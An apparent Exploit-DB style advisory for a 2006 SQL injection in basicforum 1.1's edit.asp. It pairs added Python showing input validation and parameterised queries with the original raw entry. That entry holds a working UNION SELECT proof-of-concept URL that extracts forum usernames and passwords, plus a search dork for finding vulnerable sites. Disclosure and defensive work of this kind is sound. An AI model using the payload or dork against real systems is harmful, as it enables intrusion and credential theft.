Vendor: basicforum
By: bolivar
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: basicforum
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability

A vulnerability exists in basicforum v 1.1 (edit.asp) which allows remote attackers to inject arbitrary SQL commands via the 'type' and 'id' parameters. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can result in the compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, and special characters should be escaped or removed.
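
One way to apply this mitigation to the 'type' and 'id' parameters, written as an added example and not taken from basicforum's code. Assumptions: the `messages` table, the `ALLOWED_TYPES` allowlist and the function names are hypothetical, and sqlite3 stands in for the forum's database. Parameter binding is used here in addition to the validation the advisory recommends.

```python
import sqlite3

# Assumption: values edit.asp accepts for 'type'; only "message" appears on this page.
ALLOWED_TYPES = {"message"}

def validate_params(type_value, id_value):
    """Return (type, id) when both pass validation, otherwise raise ValueError."""
    if type_value not in ALLOWED_TYPES:
        raise ValueError("unexpected type")
    # ASCII digits only and a bounded length: rejects signs, spaces and SQL keywords.
    if not (id_value.isascii() and id_value.isdigit() and len(id_value) <= 9):
        raise ValueError("id must be a positive integer")
    return type_value, int(id_value)

def load_message(conn, type_value, id_value):
    """Validate first, then bind id as a parameter so it is never parsed as SQL."""
    _, msg_id = validate_params(type_value, id_value)
    cur = conn.execute("SELECT title, body FROM messages WHERE id = ?", (msg_id,))
    return cur.fetchone()

def build_demo_db():
    """Constructed sample data; uyeler/kullanici/sifre are the names in the PoC URL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE uyeler (kullanici TEXT, sifre TEXT)")
    conn.execute("INSERT INTO messages VALUES (1, 'hello', 'first post')")
    conn.execute("INSERT INTO uyeler VALUES ('admin', 'constructed-secret')")
    return conn

def request_outcome(conn, type_value, id_value):
    """Return ('ok', row) for a valid request or ('rejected', reason) otherwise."""
    try:
        return ("ok", load_message(conn, type_value, id_value))
    except ValueError as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    db = build_demo_db()
    print(request_outcome(db, "message", "1"))
    # The id value from the request on this page, URL-decoded ('+' becomes a space).
    print(request_outcome(db, "message", "-1 union select kullanici,sifre from uyeler"))
```
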

Exploit-DB raw data:

# Title   :  basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "This script created by www.script.canavari.com"

---------------------------------------------------------------------------

http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-25]